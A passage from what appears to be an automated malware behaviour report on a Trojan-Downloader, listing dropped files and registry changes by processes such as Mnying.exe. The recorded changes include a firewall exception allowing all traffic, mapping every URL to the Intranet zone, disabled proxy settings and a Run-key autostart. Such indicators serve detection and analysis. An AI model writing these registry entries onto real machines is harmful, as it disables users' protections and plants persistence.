%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (6255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (42423 bytes)

The process tjjrfx_70745.exe:456 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tha.exe (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tmppm4bkx.dll (24832 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\dl.dll (65930 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (2157 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst5.tmp (128685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\res\onlineWnd.zip (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMSkin.dll (36698 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMReport.dll.bdl (43572 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDLogicUtils.dll (31856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\System.dll (784 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\BDMNet.dll.bdl (45996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp\tha.exe.bdl (791837 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (24 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (0 bytes)

The process tha.exe:3316 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34b3[1].data (688 bytes)
C:\ (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp3.tmp\goodpic_dae_619.exe (359 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (2186490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL (484 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b5[1].data (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (2532 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\nsExec.dll (15 bytes)
%Documents and Settings%\%current user%\UserData\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\CACT67OH.htm (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\file\vcredist_x86.exe (82435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ (96 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\BDMSkin.dll (37025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\PluginInstallHelper.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\InstallHelper.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\res\InstallWnd.zip (54196 bytes)
%WinDir%\Temp\Perflib_Perfdata_638.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014061320140614\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi6.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB (96 bytes)
C:\PROGRAM FILES (4 bytes)
%System%\config (96 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34af[1].data (552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b4[1].data (960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b6[1].data (496 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB61A.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF (300 bytes)
%Program Files%\Baidu\BaiduAn\2.1.18.21\vcredist_x86.exe (18934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXE.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\ns13.tmp (15 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl10.tmp (0 bytes)
%Program Files%\Baidu\BaiduAn\s37k (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\file\vcredist_x86.exe (0 bytes)
C:\s37k (0 bytes)
%Program Files%\s37k (0 bytes)
%Program Files%\Baidu\s37k (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp\ns13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq12.tmp (0 bytes)

The process fdcard.exe:2184 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\zn1320146\set.ini (7 bytes)
%Documents and Settings%\%current user%\Application Data\zn1320146\set1320146\Setzh1320146.ini (23 bytes)
%Documents and Settings%\%current user%\Application Data\zn1320146\min.ini (14 bytes)

Registry activity

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 36 05 8E 1C 43 C1 D8 26 D2 49 51 16 B2 48 30"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process pczh_107_306.exe:232 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.4.0]
"DisplayVersion" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\dryu]
"EN" = "pczh_107_306.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.4.0]
"DisplayIcon" = "%Program Files%\ainqngz4.0\uninstall.exe"

[HKLM\SOFTWARE\dryu]
"ED" = "107"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\dryu]
"EX" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\dryu]
"et" = "1320146"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.4.0]
"UninstallString" = "%Program Files%\ainqngz4.0\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.4.0]
"DisplayName" = "°®Çé.ÖÇ»Û4.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\jsgt]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 DA CC 0F ED 05 5E A7 D3 1F A3 67 7F 8E EF DD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz4.0.exe]
"(Default)" = "%Program Files%\ainqngz4.0\Ainqngz4.0.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sc.exe:2108 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 B7 6F 3A 2D 79 FA 85 72 F6 52 87 CC 5B 8B D7"

The process sc.exe:2092 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 8F A8 43 B9 EB 32 14 23 C9 04 CD 74 6B A6 5C"

The process Mnying.exe:2364 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014061320140614]
"CachePrefix" = ":2014061320140614:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014061320140614]
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Mnying.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014061320140614]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1399978749"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 E5 2C 36 EC 0D AB A4 77 EC 34 EA C9 DD BB 80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014061320140614]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014061320140614\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014061320140614]
"CacheRepair" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Mnying]
"Mnying.exe" = "%Program Files%\Mnying\Mnying.exe:*:Enabled:ÃÀŮӪ"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Mnying]
"Mnying.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"

The process Mnying.exe:1992 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Mnying]
"insg" = "2"
"cid" = "-37237366455960"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Mnying]
"ctm" = "01 14 99 4D 7B 69 E4 40"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Mnying]
"stdd" = "KtG6TXtp5ECEUEH3gWnkQA=="

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Mnying]
"hadt" = "0"

"Renwucan1" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 99 AE 52 1F 28 8A 83 2B B5 B7 41 93 5D 22 74"

[HKCU\Software\Mnying]
"instd" = "41803"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Mnying]
"hadip" = "125.43.78.107"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Mnying]
"Mnying.exe" = "%Program Files%\Mnying\Mnying.exe:*:Enabled:ÃÀŮӪ"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan-Downloader adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Mnying" = "%Program Files%\Mnying\Mnying.exe /A"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Mnying]
"ci2"
"ci1"

The process Mnying.exe:3116 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Mnying.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

